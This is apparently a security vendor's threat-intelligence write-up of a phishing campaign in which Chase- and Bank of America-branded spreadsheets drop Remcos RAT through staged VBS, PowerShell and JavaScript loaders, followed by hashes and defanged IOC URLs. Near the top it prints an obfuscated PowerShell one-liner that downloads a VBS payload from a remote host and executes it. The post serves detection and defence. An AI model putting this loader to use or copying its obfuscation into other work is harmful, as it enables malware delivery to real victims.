Analysis of a Remcos RAT Dropper

Posted on 2022-01-24 by Dmitry Melikov

Some time ago, we discovered a large wave of phishing emails with an exciting delivery method. This article will describe this method and show how it works, starting from a malicious document. We will explore the following documents, each with a beautiful visual lure that abuses the names and logos of Chase Bank and Bank of America.

File Typexlsx document
Sha-256c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915
Figure 1: Chase branded coercive lure

Figure 2: Bank of America branded coercive lure

ping google.com;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.twt\''+pmet:vne$,''gv6BNpMg30gwvPA=yekhtua&30212%3F148E16A9A6766D=diser&3F148E16A9A6766D=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\twt.vbs')  

The program runs the following script to load the first stage payload at startup. The purpose of this code is relatively simple: It checks to see if there is an internet connection, downloading and executing the payload if so.

SHA-256: 3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71 

Figure 3: tweet.vs (First stage)

The payload of the first stage also loads the next stage. This script uses a fairly simple way to obscure the URL of the download of the malicious load of the next stage. The characters are simply converted to hexadecimal values.

Figure 4: tvt.vbs

A section of code that shows that the downloaded payload will be written to the registry to launch the malicious application when the system reboots.

Figure 5: Stage 2

             

The second stage payload is the PowerShell script shown in the following image . The PowerShell script is placed here in the form of shell code.

Figure 6: PowerShell script

The last component in the attack chain is the most interesting, a .js script that contains an executable library in its body. This is observable in the following image. The executable code is deliberately littered with junk content to reduce static detection. The script replaces unnecessary characters with zeros at run time and starts the dynamic link library.

File TypeJava Script
SHA256ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd
Figure 7. JS containing an obfuscated executable library

After extracting and clearing the data, we get an executable library written in C#. This is the final stage of infection in this campaign.

File TypeExecutable .NET
SHA256b7fd83f6d8bbd17d4aefa8f4e28d4503f1c4ab6ab70401b1a67e209da6197cde
73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1

The final executable library is a tool for remote access, Remcos RAT. With this software, attackers can gain unauthorized remote access to targeted systems.

InQuest Deep File Inspection (DFI) successfully detects malicious documents that are the first step in this campaign. 

IOCs

  • c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915 
  • 87d78153d9d87c7e7e130feb052b1059837dcf6ebe0a128b75be75062ee11f9f 
  • d874fc97e460e2c147782581d320f1673780ee99246286ce9d248c2a20a98773
  • 7e97a402dfea6b367245ba7a7b7e9811a867e23d4a339f14f79a7420b5b6f5a6
  • b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e
  • e37875bf204cb272dc38240363cc1e75929104b61ca0143441062b461ea8ce1f
  • 08a1259090d5bf015cfd80caa7ac3ff5060ad503825ea5a5f010cec03178c157
  • hxxp://104.223.119.167/calient.jpg
  • hxxp://104.223.119.167/han.jpg
  • hxxp://64.188.19.241/na.jpg
  • hxxp://64.188.19.241/atc.jpg
  • hxxp://64.188.19.241/rtc.jpg
  • hxxp://64.188.19.241/ghini.vbs

Tags
in-the-wild threat-intel

Get The InQuest Insider

Find us on Twitter for frequent updates, follow our Blog for bi-weekly technical write-ups, or subscribe here to receive our monthly newsletter, The InQuest Insider. We curate and provide you with the latest news stories, field notes about innovative malware, novel research / analysis / threat hunting tools, security tips and more.